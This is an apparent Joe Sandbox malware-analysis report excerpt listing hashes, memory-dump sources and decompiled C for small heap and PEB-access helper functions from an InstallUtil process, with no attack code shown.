                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0416e2594170a51d3927ad040bd47611a7c82a69c4215aebc215b09134698855
                      • Instruction ID: 47059df9f148fd00e06d4571f8ec2ae3f5608087cb0db8d6ceebb16f5543b13e
                      • Opcode Fuzzy Hash: 0416e2594170a51d3927ad040bd47611a7c82a69c4215aebc215b09134698855
                      • Instruction Fuzzy Hash: ABE0DFB02292069FDB35DB59D240F2D3B989B52729F19809DE90A4B182C621E882C29E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 82%
                      			E013541E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                      				void* _t5;
                      				void* _t14;
                      
                      				_push(8);
                      				_push(0x13a08f0);
                      				_t5 = E0131D08C(__ebx, __edi, __esi);
                      				if( *0x13b87ec == 0) {
                      					E012DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                      					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                      					if( *0x13b87ec == 0) {
                      						 *0x13b87f0 = 0x13b87ec;
                      						 *0x13b87ec = 0x13b87ec;
                      						 *0x13b87e8 = 0x13b87e4;
                      						 *0x13b87e4 = 0x13b87e4;
                      					}
                      					 *(_t14 - 4) = 0xfffffffe;
                      					_t5 = L01354248();
                      				}
                      				return E0131D0D1(_t5);
                      			}





                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8dc5439ef33ac7ca7046ed46fd2f307ce05e6f989f8a387a8c0f6fdf79ef4b8a
                      • Instruction ID: 44fdd5b5933ffaaadb917a2359bec77e43fd78b0f4b9ff637414801d70fe8b35
                      • Opcode Fuzzy Hash: 8dc5439ef33ac7ca7046ed46fd2f307ce05e6f989f8a387a8c0f6fdf79ef4b8a
                      • Instruction Fuzzy Hash: F0F01578820709CECBB4EFA9E58AB2436ACFB5476EF10419A920087688F73444A5CF01
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0137D380(void* __ecx, void* __edx, intOrPtr _a4) {
                      				void* _t5;
                      
                      				if(_a4 != 0) {
                      					_t5 = L012CE8B0(__ecx, _a4, 0xfff);
                      					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                      					return _t5;
                      				}
                      				return 0xc000000d;
                      			}




                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                      • Instruction ID: 547d157db2c7bf989d5fbdf90bfea1d904a847171d3bdf42bc6f2ca6b0969c10
                      • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                      • Instruction Fuzzy Hash: E5E0C231280209BBEB325E84CC00F797B5ADF50BA4F104035FE085AAA0C6799C91DAC4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E012FA185() {
                      				void* __ecx;
                      				intOrPtr* _t5;
                      
                      				if( *0x13b67e4 >= 0xa) {
                      					if(_t5 < 0x13b6800 || _t5 >= 0x13b6900) {
                      						return L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                      					} else {
                      						goto L1;
                      					}
                      				} else {
                      					L1:
                      					return E012E0010(0x13b67e0, _t5);
                      				}
                      			}





                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 66fdeaa55dbd7f2a26a20b8a1c1293e5a2d0d88fedd8c8d39e65293b15362df3
                      • Instruction ID: bb6611b749807794d3fbed2cb15e3fc623c467ed3c7d0e981fd38fb4675b9952
                      • Opcode Fuzzy Hash: 66fdeaa55dbd7f2a26a20b8a1c1293e5a2d0d88fedd8c8d39e65293b15362df3
                      • Instruction Fuzzy Hash: B0D02BE117100016D62D130098AAB76365EF794754F35041CF30B4BD92F9508CD88118
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E012F16E0(void* __edx, void* __eflags) {
                      				void* __ecx;
                      				void* _t3;
                      
                      				_t3 = E012F1710(0x13b67e0);
                      				if(_t3 == 0) {
                      					_t6 =  *[fs:0x30];
                      					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                      						goto L1;
                      					} else {
                      						return L012E4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                      					}
                      				} else {
                      					L1:
                      					return _t3;
                      				}
                      			}





                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 32edc6a781c05cce2960a4178e0e4eef7b85ccf4708db712b5aacedd8fbbc404
                      • Instruction ID: e3b800a106db2546de602f8784c0e00ca59e366d72ff63d5351d494200ebf2c1
                      • Opcode Fuzzy Hash: 32edc6a781c05cce2960a4178e0e4eef7b85ccf4708db712b5aacedd8fbbc404
                      • Instruction Fuzzy Hash: ABD0A771120142DAEE2D5B149845B246655EB90785F78007CF30B598C1EFA1DCB2E44C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E013453CA(void* __ebx) {
                      				intOrPtr _t7;
                      				void* _t13;
                      				void* _t14;
                      				intOrPtr _t15;
                      				void* _t16;
                      
                      				_t13 = __ebx;
                      				if( *((char*)(_t16 - 0x65)) != 0) {
                      					E012DEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                      					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                      					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                      				}
                      				if(_t15 != 0) {
                      					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                      					return  *((intOrPtr*)(_t16 - 0x64));
                      				}
                      				return _t7;
                      			}








                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                      • Instruction ID: 9d0ace69c7427e3d5e507c4bb844c1e240345a23e0c39d56dcf035d0c8e359b6
                      • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                      • Instruction Fuzzy Hash: 5EE08C329507809BCF16EB49C650F5EBBF5FB44B00F150044A0085F620C624AC00CB40
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E012DAAB0() {
                      				intOrPtr* _t4;
                      
                      				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                      				if(_t4 != 0) {
                      					if( *_t4 == 0) {
                      						goto L1;
                      					} else {
                      						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                      					}
                      				} else {
                      					L1:
                      					return 0x7ffe0030;
                      				}
                      			}




                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                      • Instruction ID: 5b99b5335035badbbd1c91bfd57479bcbb833ac54e7e18a60a371fea36dbfc88
                      • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                      • Instruction Fuzzy Hash: CBD0E939352991CFD617DB1DC554B1577B4BB44B44FD50590E501CBB62E62CD944CA00
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E012F35A1(void* __eax, void* __ebx, void* __ecx) {
                      				void* _t6;
                      				void* _t10;
                      				void* _t11;
                      
                      				_t10 = __ecx;
                      				_t6 = __eax;
                      				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                      					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                      				}
                      				if( *((char*)(_t11 - 0x1a)) != 0) {
                      					return E012DEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                      				}
                      				return _t6;
                      			}






                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                      • Instruction ID: ec7aa5a2bf8d403c3c5facbd2d3bd7911160f564557e015ec8094069a5746a44
                      • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                      • Instruction Fuzzy Hash: 48D0A77143118299DF01EB14E11C7FCB771BB44308F58107D834109452C3354909C700
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E012CDB40() {
                      				signed int* _t3;
                      				void* _t5;
                      
                      				_t3 = L012E4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                      				if(_t3 == 0) {
                      					return 0;
                      				} else {
                      					 *_t3 =  *_t3 | 0x00000400;
                      					return _t3;
                      				}
                      			}





                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                      • Instruction ID: 95e828255a598526802eee51770d6c9c2e23a59ffb5902e4d2c1c64589e12344
                      • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                      • Instruction Fuzzy Hash: 74C08C302A0A42AEEB222F20CD01B103AA0BB10F01F8400A06700DA0F0EB78D801EA00
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0134A537(intOrPtr _a4, intOrPtr _a8) {
                      
                      				return L012E8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                      			}



                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                      • Instruction ID: f75e952279074d14de345b12572e83f9afd1430fe2727e82b2c9dc165f7c6ac8
                      • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                      • Instruction Fuzzy Hash: 55C08C33080248BBCB126F81CC00F267F6AFBA4B60F048010FA480B570C632E970EB94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E012E3A1C(intOrPtr _a4) {
                      				void* _t5;
                      
                      				return L012E4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                      			}




                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                      • Instruction ID: a23b48ed9b8bd8d286760d11c143447df584b60ed5f87a2a260f07fa1ed5fd32
                      • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                      • Instruction Fuzzy Hash: B0C08C32080288BBCB126E41DC00F117B69E7A0B60F000020BA080A5608532EC60D98C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E012CAD30(intOrPtr _a4) {
                      
                      				return L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                      			}



                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                      • Instruction ID: 5af7c26f40d60857d88766a2b22142e985b3434ca076347fb2104e5459abf6ed
                      • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                      • Instruction Fuzzy Hash: 34C02B330C0248BBC7166F46DD00F117F6DE7A0B60F000020F6040B671C932EC60D5C8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E012D76E2(void* __ecx) {
                      				void* _t5;
                      
                      				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                      					return L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                      				}
                      				return _t5;
                      			}




                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                      • Instruction ID: 6b613d982ab21ba9e1804cc76b8fe2ac2a89bed6c00a5b2e7bf224b67277be2d
                      • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                      • Instruction Fuzzy Hash: A3C08C701A11825EEB2E570CCE24B307A90AB0860CF88019CAB01094E2D36CA802C288
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E012F36CC(void* __ecx) {
                      
                      				if(__ecx > 0x7fffffff) {
                      					return 0;
                      				} else {
                      					return L012E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                      				}
                      			}



                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                      • Instruction ID: 0d8fc6b5744271ee3b470349d7c08a4516109c81588a938d94cd7c0c945f82b0
                      • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                      • Instruction Fuzzy Hash: 0DC02B70170480FFDB156F30CD00F24B2D4F700A21FA403687320854F0D528DC00D50C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E012E7D50() {
                      				intOrPtr* _t3;
                      
                      				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                      				if(_t3 != 0) {
                      					return  *_t3;
                      				} else {
                      					return _t3;
                      				}
                      			}




                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                      • Instruction ID: c38cd9e402216bfc490b473bd3cdb6c37e96630d498e2907ce44739c0ca6f1c4
                      • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                      • Instruction Fuzzy Hash: FFB09235311942CFCE16DF18C084B1533E8BB44A40F8400D0E400CBA21D32AE8008900
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E012F2ACB() {
                      				void* _t5;
                      
                      				return E012DEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                      			}




                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                      • Instruction ID: 5a0124c324424514ba7891299b668fb3b8c527669462d7ec0f4df916990edb2c
                      • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                      • Instruction Fuzzy Hash: B5B01232C20541CFCF02FF40C610B297331FB00750F06449090012B930C228BC01CB40
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dee667bba821a137e044d059010fdf955fb60f82a330f7f12f15ca5a0b3e20f7
                      • Instruction ID: 7c3af462cf6d045dc2e6e3775a19200237cb0d1c8996e5dfe1dad5e2cbc58738
                      • Opcode Fuzzy Hash: dee667bba821a137e044d059010fdf955fb60f82a330f7f12f15ca5a0b3e20f7
                      • Instruction Fuzzy Hash: 799002A520141403D544659948086070405A7D1346F51C421A2054555ECA698C657175
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 01f35747f847b3e77a9c9bd355bc687029de3d5aa6c19350df66b75539c03045
                      • Instruction ID: dc65bbfc53d3a22b3b18fb6f48d7f1720abec74e082aacd7a40f306698b19c5f
                      • Opcode Fuzzy Hash: 01f35747f847b3e77a9c9bd355bc687029de3d5aa6c19350df66b75539c03045
                      • Instruction Fuzzy Hash: B19002A521101042D508619944087060445A7E2345F51C422A2144554CC5698C756165
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b0e88820a7e99ef475c6d014ebdb6e2aef1d0e66535682ef93ab86f75e70b476
                      • Instruction ID: a8e8f4231b41dfc3032920b8f1b7ae52afcc2fcd138785d4918543d3cf31f220
                      • Opcode Fuzzy Hash: b0e88820a7e99ef475c6d014ebdb6e2aef1d0e66535682ef93ab86f75e70b476
                      • Instruction Fuzzy Hash: F590027524101402D545719944086060409B7D1385F91C422A0414554EC6958A6ABAA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d2d52e281404eec23fa97d29f8d51074f1f5aa0572b36beb09b9ef5cec2e65e4
                      • Instruction ID: 7dbf43c3fe44aece7c548a3e0586d462efd79169df008138055ea6cd102e7291
                      • Opcode Fuzzy Hash: d2d52e281404eec23fa97d29f8d51074f1f5aa0572b36beb09b9ef5cec2e65e4
                      • Instruction Fuzzy Hash: EC9002A5601150438944B19948084065415B7E2345391C531A0444560CC6A88869A2A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b377f492f3885cb10921b5c2aa608edf0744f0e97e0e0f1ab23e5d1b9e0e63d8
                      • Instruction ID: 08bb7e90d150d3b1be341968f75cddc306ac77f225857ce35c07475ab870cd8a
                      • Opcode Fuzzy Hash: b377f492f3885cb10921b5c2aa608edf0744f0e97e0e0f1ab23e5d1b9e0e63d8
                      • Instruction Fuzzy Hash: 7E90026530101402D506619944186060409E7D2389F91C422E1414555DC6658967B172
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 63f2634648613efb6768e2d4380e969f7aa96ae827393cca44ce5c6d2e236b48
                      • Instruction ID: 7fb035a1a2413589fcccf666919fdeb1852a3ab476d5a905332ace62d2a47ca4
                      • Opcode Fuzzy Hash: 63f2634648613efb6768e2d4380e969f7aa96ae827393cca44ce5c6d2e236b48
                      • Instruction Fuzzy Hash: C690026524101802D544719984187070406E7D1745F51C421A0014554DC656897976F1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ecfd6d94182ab58a221d9e58cd823d9ce13e3173701ad59e83cbfbbe785ad006
                      • Instruction ID: b65f4f09cf0bc54eb742201c51806bf76b6a6893d75c4f04129cff69e6425ea5
                      • Opcode Fuzzy Hash: ecfd6d94182ab58a221d9e58cd823d9ce13e3173701ad59e83cbfbbe785ad006
                      • Instruction Fuzzy Hash: AF90027520145002D5447199844860B5405B7E1345F51C821E0415554CC655886AA261
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
